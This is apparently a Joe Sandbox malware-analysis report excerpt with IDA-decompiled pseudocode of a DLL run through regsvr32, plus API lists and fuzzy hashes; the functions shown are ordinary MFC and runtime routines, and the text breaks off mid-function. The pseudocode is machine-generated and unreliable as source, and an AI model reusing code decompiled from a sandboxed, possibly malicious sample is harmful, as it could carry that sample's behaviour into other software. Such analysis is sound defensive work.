                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 4108760c55753768d462f865b41ffcd9b3d9d5b3ee2fcc110227f12e73c1aa31
                                                                                                                • Instruction ID: 5661e288fa7dbb988df4e339b8a46c47127f1e798670e99cd3e35df3d68ae36c
                                                                                                                • Opcode Fuzzy Hash: 4108760c55753768d462f865b41ffcd9b3d9d5b3ee2fcc110227f12e73c1aa31
                                                                                                                • Instruction Fuzzy Hash: 7AF0F03A2412296BE742CBA55C84D3FB6ECEFC95A6B42003CFE05E7211CE70DC4182A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10013F80(void* __edx) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t14;
                                                                                                                				signed int _t15;
                                                                                                                				void* _t21;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr* _t23;
                                                                                                                				void* _t32;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				signed int _t36;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10052632);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t23);
                                                                                                                				_t14 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t15 = _t14 ^ _t36;
                                                                                                                				_t38 = _t15;
                                                                                                                				_push(_t15);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t34 = _t23;
                                                                                                                				_v16 = _t34;
                                                                                                                				 *_t34 = 0x10059734;
                                                                                                                				_v4 = 3;
                                                                                                                				E10021AC4(_t34 + 0x184, _t32, _t34, _t15);
                                                                                                                				_v4 = 2;
                                                                                                                				E10021AC4(_t34 + 0x130, _t32, _t34, _t15);
                                                                                                                				_v4 = 1;
                                                                                                                				E10021AC4(_t34 + 0xdc, _t32, _t34, _t38);
                                                                                                                				_v4 = 0;
                                                                                                                				E10021AC4(_t34 + 0x88, _t32, _t34, _t38);
                                                                                                                				_v4 = 0xffffffff;
                                                                                                                				_t21 = E1002BDE8(_t22, _t34, __edx, _t32, _t34, _t38);
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t21;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FBC
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FCC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FDC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10013FEC
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: 721071f11f51c364018cfe54477fa3493f99bfbb6d6ccb520add610a660b3209
                                                                                                                • Instruction ID: 1510f530a5ecaef1d1cdf92aaf8eb180ec908d96fcc9648accdaab38d48b524c
                                                                                                                • Opcode Fuzzy Hash: 721071f11f51c364018cfe54477fa3493f99bfbb6d6ccb520add610a660b3209
                                                                                                                • Instruction Fuzzy Hash: 7E017C380097819ED314CF28D851BDABBD4EF59720F844A0EE4A9432C1DB746508CBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E1000A7A0() {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t14;
                                                                                                                				signed int _t15;
                                                                                                                				void* _t21;
                                                                                                                				intOrPtr _t22;
                                                                                                                				void* _t30;
                                                                                                                				signed int _t34;
                                                                                                                
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E1005150F);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t22);
                                                                                                                				_t14 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t15 = _t14 ^ _t34;
                                                                                                                				_t36 = _t15;
                                                                                                                				_push(_t15);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t32 = _t22;
                                                                                                                				_v16 = _t22;
                                                                                                                				_v4 = 3;
                                                                                                                				E10021AC4(_t32 + 0x174, _t30, _t32, _t15);
                                                                                                                				_v4 = 2;
                                                                                                                				E10021AC4(_t32 + 0x120, _t30, _t32, _t15);
                                                                                                                				_v4 = 1;
                                                                                                                				E10021AF5(_t32 + 0xcc, _t30, _t32, _t36);
                                                                                                                				_v4 = 0;
                                                                                                                				E10021A4D(_t32 + 0x78, _t30, _t32, _t36);
                                                                                                                				_v4 = 0xffffffff;
                                                                                                                				_t21 = E10020C98(_t32, _t30, _t32, _t36);
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t21;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7D6
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7E6
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A7F6
                                                                                                                  • Part of subcall function 10021AF5: __EH_prolog3.LIBCMT ref: 10021AFC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000A803
                                                                                                                  • Part of subcall function 10021A4D: __EH_prolog3.LIBCMT ref: 10021A54
                                                                                                                  • Part of subcall function 10020C98: __EH_prolog3.LIBCMT ref: 10020C9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Task_impl
                                                                                                                • String ID:
                                                                                                                • API String ID: 2182512335-0
                                                                                                                • Opcode ID: 7f315b461508fa932f8164ff5143e08997d3b8af1e1fd0b8baf9fad85137aeb7
                                                                                                                • Instruction ID: db444dcca7405f81db96a322a9f437cad57cd2ec34596c01685f13a0e8433cee
                                                                                                                • Opcode Fuzzy Hash: 7f315b461508fa932f8164ff5143e08997d3b8af1e1fd0b8baf9fad85137aeb7
                                                                                                                • Instruction Fuzzy Hash: 21018F79009741CFE315CF24D441BDAB7E4EB58720F844A0EF4AA432C1DB74650887A3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100214A2() {
                                                                                                                				intOrPtr _t16;
                                                                                                                				struct HWND__* _t19;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr* _t28;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                                				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                                					E1001D39A(_t23, 1);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                                					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                                				}
                                                                                                                				if( *(_t29 - 0x14) != 0) {
                                                                                                                					_t19 = GetActiveWindow();
                                                                                                                					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                                					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                                						SetActiveWindow( *(_t29 - 0x14));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                                				E10020ED7(_t23, _t28, 0, _t28, _t34);
                                                                                                                				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                                					FreeResource( *(_t29 - 0x18));
                                                                                                                				}
                                                                                                                				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                                				return E1003D2BE(_t16);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 100214C2
                                                                                                                • GetActiveWindow.USER32 ref: 100214CD
                                                                                                                • SetActiveWindow.USER32(?), ref: 100214DB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10009C92), ref: 100214F7
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveEnable$FreeResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 253586258-0
                                                                                                                • Opcode ID: 0f78419244131bdc507acf83cf4c5c519e63c8e4908cbe74e2599e513c5479ec
                                                                                                                • Instruction ID: 144da58f2501560bc1c7b2dbcd48d629faaead7d86b7dde088ced9662b81623c
                                                                                                                • Opcode Fuzzy Hash: 0f78419244131bdc507acf83cf4c5c519e63c8e4908cbe74e2599e513c5479ec
                                                                                                                • Instruction Fuzzy Hash: 0FF03C38A40615CFDF12EB64DC855ADB7B2FF58B02F900525E44672261DB726D80CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10039E8D(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				signed int _t8;
                                                                                                                				int _t9;
                                                                                                                				void* _t12;
                                                                                                                				void* _t13;
                                                                                                                				signed int* _t14;
                                                                                                                				void* _t15;
                                                                                                                
                                                                                                                				_t11 = __ecx;
                                                                                                                				_t13 = __ecx;
                                                                                                                				E10039B0A(__ecx, __eflags, 1);
                                                                                                                				ReleaseCapture();
                                                                                                                				_t12 = E10019C16(__ebx, _t11, _t15, GetDesktopWindow());
                                                                                                                				LockWindowUpdate(0);
                                                                                                                				_t14 = _t13 + 0x84;
                                                                                                                				_t8 =  *_t14;
                                                                                                                				if(_t8 != 0) {
                                                                                                                					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
                                                                                                                					 *_t14 =  *_t14 & 0x00000000;
                                                                                                                					return _t9;
                                                                                                                				}
                                                                                                                				return _t8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                  • Part of subcall function 10039B0A: GetStockObject.GDI32(00000000), ref: 10039B20
                                                                                                                  • Part of subcall function 10039B0A: InflateRect.USER32 ref: 10039BB9
                                                                                                                • ReleaseCapture.USER32 ref: 10039E98
                                                                                                                • GetDesktopWindow.USER32 ref: 10039E9E
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 10039EAE
                                                                                                                • ReleaseDC.USER32(?,?), ref: 10039EC6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1260764132-0
                                                                                                                • Opcode ID: a2c3acf1e2e453df2f760b61173b1142a348cc0220d8ffe00eec45ed2784926c
                                                                                                                • Instruction ID: a59d17796b37ffe237d6abb3d5f5a7ab65e78e22822fd2a3be228eadfa2ed198
                                                                                                                • Opcode Fuzzy Hash: a2c3acf1e2e453df2f760b61173b1142a348cc0220d8ffe00eec45ed2784926c
                                                                                                                • Instruction Fuzzy Hash: DEE04F365002219FE7215F75ED4DB467BA4EF88352F114824F5858B166DB7AD850CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E100386BF(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				long _t4;
                                                                                                                				long _t5;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t9;
                                                                                                                				void* _t13;
                                                                                                                
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					__eflags =  *0x10070f24;
                                                                                                                					if( *0x10070f24 == 0) {
                                                                                                                						_t5 = GetTickCount();
                                                                                                                						 *0x10070f24 =  *0x10070f24 + 1;
                                                                                                                						__eflags =  *0x10070f24;
                                                                                                                						 *0x1006dab8 = _t5;
                                                                                                                					}
                                                                                                                					_t4 = GetTickCount() -  *0x1006dab8;
                                                                                                                					__eflags = _t4 - 0xea60;
                                                                                                                					if(_t4 > 0xea60) {
                                                                                                                						__imp__CoFreeUnusedLibraries();
                                                                                                                						_t4 = GetTickCount();
                                                                                                                						 *0x1006dab8 = _t4;
                                                                                                                					}
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return E10038668(_t7, _t8, _t9, _t13, _t14, _a8);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 100386E1
                                                                                                                • GetTickCount.KERNEL32 ref: 100386EE
                                                                                                                • CoFreeUnusedLibraries.OLE32 ref: 100386FD
                                                                                                                • GetTickCount.KERNEL32 ref: 10038703
                                                                                                                  • Part of subcall function 10038668: CoFreeUnusedLibraries.OLE32 ref: 100386AC
                                                                                                                  • Part of subcall function 10038668: OleUninitialize.OLE32 ref: 100386B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 685759847-0
                                                                                                                • Opcode ID: 58750139c67a11acae0ddc8f75755ca330751f3d3c7bd4016983ab49dfd01929
                                                                                                                • Instruction ID: b47bdf0f090c39dd5d0a7a8417e74432adb76d31f73c56e95a4bac197a867448
                                                                                                                • Opcode Fuzzy Hash: 58750139c67a11acae0ddc8f75755ca330751f3d3c7bd4016983ab49dfd01929
                                                                                                                • Instruction Fuzzy Hash: 22E0E53480C325DEEB52FB74CDC96097AE1FB08246F204667E48196460C6B469C5CF56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100323BD(intOrPtr* __ecx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr* _t104;
                                                                                                                				signed int _t106;
                                                                                                                				signed int _t118;
                                                                                                                				intOrPtr* _t122;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t146;
                                                                                                                				void* _t149;
                                                                                                                				signed int _t150;
                                                                                                                				signed int _t174;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t177;
                                                                                                                				void* _t182;
                                                                                                                				signed int _t184;
                                                                                                                				void* _t185;
                                                                                                                				void* _t187;
                                                                                                                
                                                                                                                				_t186 = __ecx;
                                                                                                                				_t146 = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                                					__eflags =  *(__ecx + 0x40);
                                                                                                                					if( *(__ecx + 0x40) == 0) {
                                                                                                                						L9:
                                                                                                                						_t149 = 0;
                                                                                                                						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                                                                                						 *(_t186 + 0x38) = _t146;
                                                                                                                						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                                                                                							L12:
                                                                                                                							_t103 =  *(_t186 + 0x38);
                                                                                                                							__eflags = _t103 - _t146;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								_t176 = 0x30;
                                                                                                                								_t172 = _t103 * _t176 >> 0x20;
                                                                                                                								_t167 =  ~(__eflags > 0) | _t103 * _t176;
                                                                                                                								 *((intOrPtr*)(_t186 + 0x3c)) = E100160BC( ~(__eflags > 0) | _t103 * _t176, _t167);
                                                                                                                							}
                                                                                                                							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
                                                                                                                							_v12 = _t146;
                                                                                                                							_v16 = _t146;
                                                                                                                							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
                                                                                                                								L21:
                                                                                                                								_t150 =  *(_t186 + 0x38);
                                                                                                                								_t104 =  *((intOrPtr*)(_t186 + 8));
                                                                                                                								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
                                                                                                                								_t106 =  *(_t186 + 0x38);
                                                                                                                								__eflags = _t106 - _t146;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t174 = 0x10;
                                                                                                                									_t156 =  ~(__eflags > 0) | _t106 * _t174;
                                                                                                                									 *(_t186 + 0x40) = E100160BC( ~(__eflags > 0) | _t106 * _t174, _t156);
                                                                                                                								}
                                                                                                                								__eflags =  *(_t186 + 0x38) - _t146;
                                                                                                                								if( *(_t186 + 0x38) <= _t146) {
                                                                                                                									L26:
                                                                                                                									E10031B2C(_t186);
                                                                                                                									return  *((intOrPtr*)( *_t186 + 0x10))();
                                                                                                                								} else {
                                                                                                                									_t182 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									do {
                                                                                                                										E1003BB70(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
                                                                                                                										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
                                                                                                                										_t187 = _t187 + 0xc;
                                                                                                                										_t146 = _t146 + 1;
                                                                                                                										_t182 = _t182 + 0x10;
                                                                                                                										__eflags = _t146 -  *(_t186 + 0x38);
                                                                                                                									} while (_t146 <  *(_t186 + 0x38));
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_v8 = _t146;
                                                                                                                								do {
                                                                                                                									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
                                                                                                                									__eflags = _t118 - _t146;
                                                                                                                									_v20 = _t118;
                                                                                                                									if(_t118 == _t146) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									_t184 = _v12 * 0x30;
                                                                                                                									__eflags = _t184;
                                                                                                                									do {
                                                                                                                										_t122 = E100182A6( &_v20);
                                                                                                                										E1002F7C9(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
                                                                                                                										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
                                                                                                                										_v12 = _v12 + 1;
                                                                                                                										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
                                                                                                                										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
                                                                                                                										_t184 = _t184 + 0x30;
                                                                                                                										__eflags = _v20;
                                                                                                                									} while (_v20 != 0);
                                                                                                                									_t146 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                									L20:
                                                                                                                									_v16 = _v16 + 1;
                                                                                                                									_v8 = _v8 + 0x28;
                                                                                                                									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
                                                                                                                								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
                                                                                                                								goto L21;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
                                                                                                                						__eflags = _t138;
                                                                                                                						do {
                                                                                                                							_t177 =  *_t138;
                                                                                                                							_t172 =  *(_t177 + 0xc);
                                                                                                                							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
                                                                                                                							_t149 = _t149 + 1;
                                                                                                                							_t138 = _t138 + 0x28;
                                                                                                                							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
                                                                                                                						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					_t185 = 0;
                                                                                                                					__eflags =  *(__ecx + 0x38);
                                                                                                                					if( *(__ecx + 0x38) <= 0) {
                                                                                                                						L8:
                                                                                                                						 *(_t186 + 0x40) = _t146;
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_v12 = 0;
                                                                                                                					do {
                                                                                                                						__imp__#9( *(__ecx + 0x40) + _v12);
                                                                                                                						_v12 = _v12 + 0x10;
                                                                                                                						_t185 = _t185 + 1;
                                                                                                                						__eflags = _t185 -  *(__ecx + 0x38);
                                                                                                                					} while (_t185 <  *(__ecx + 0x38));
                                                                                                                					__eflags =  *(__ecx + 0x38);
                                                                                                                					if(__eflags > 0) {
                                                                                                                						_push( *(__ecx + 0x40));
                                                                                                                						E100160E7(0, _t185, __ecx, __eflags);
                                                                                                                						_push( *((intOrPtr*)(_t186 + 0x3c)));
                                                                                                                						E100160E7(0, _t185, _t186, __eflags);
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				E10031B2C(__ecx);
                                                                                                                				return  *((intOrPtr*)( *__ecx + 0x10))();
                                                                                                                			}




























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1473721057-3887548279
                                                                                                                • Opcode ID: 4794f33b9828aa8a43699f7c3482730240ac2f5c0e8e3317ecab65dff5235b8f
                                                                                                                • Instruction ID: 4e79bf42a13b8e982a901a6c30ab1a867a5adc2d132178db6a4f095cf165699d
                                                                                                                • Opcode Fuzzy Hash: 4794f33b9828aa8a43699f7c3482730240ac2f5c0e8e3317ecab65dff5235b8f
                                                                                                                • Instruction Fuzzy Hash: 63514675A00B01DFCB65CF69C98296AB7F5FF48315B504A6EE5828BA91C770F981CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E100300E9(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _v4;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				void* _v28;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				intOrPtr _v56;
                                                                                                                				char _v60;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				intOrPtr _v80;
                                                                                                                				short _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				short _v96;
                                                                                                                				short _v100;
                                                                                                                				signed int _v104;
                                                                                                                				intOrPtr _v108;
                                                                                                                				intOrPtr _v112;
                                                                                                                				signed int _v116;
                                                                                                                				intOrPtr _v120;
                                                                                                                				char _v124;
                                                                                                                				signed int* _t79;
                                                                                                                				void* _t90;
                                                                                                                				intOrPtr _t97;
                                                                                                                				intOrPtr* _t114;
                                                                                                                				intOrPtr* _t116;
                                                                                                                				intOrPtr* _t118;
                                                                                                                				signed int _t120;
                                                                                                                				signed int _t128;
                                                                                                                				signed int _t131;
                                                                                                                				intOrPtr _t132;
                                                                                                                				void* _t155;
                                                                                                                
                                                                                                                				_t153 = __edi;
                                                                                                                				_push(0x70);
                                                                                                                				E1003D1E6(E100544B5, __ebx, __edi, __esi);
                                                                                                                				_t155 = __ecx;
                                                                                                                				_t79 =  *(__ecx + 0x50);
                                                                                                                				_t128 = 0;
                                                                                                                				_t131 = 0 | _t79 != 0x00000000;
                                                                                                                				if(_t131 != 0) {
                                                                                                                					_push( &_v16);
                                                                                                                					_push(0x1005fad4);
                                                                                                                					_v16 = 0;
                                                                                                                					_t131 =  *_t79;
                                                                                                                					_push(_t79);
                                                                                                                					_v20 = 0;
                                                                                                                					if( *_t131() < 0) {
                                                                                                                						L19:
                                                                                                                						return E1003D2BE(_v20);
                                                                                                                					} else {
                                                                                                                						if((0 | _v16 != 0x00000000) == 0) {
                                                                                                                							goto L4;
                                                                                                                						} else {
                                                                                                                							_v120 = __ecx + 0xc8;
                                                                                                                							_v112 = __ecx + 0xd8;
                                                                                                                							_v108 = __ecx + 0xdc;
                                                                                                                							_v124 = 0x40;
                                                                                                                							_v116 = 0;
                                                                                                                							_v88 = 0;
                                                                                                                							_v76 = 0;
                                                                                                                							_v72 = 0;
                                                                                                                							E1002A12B( &_v36);
                                                                                                                							_t97 =  *((intOrPtr*)(__ecx + 0x20));
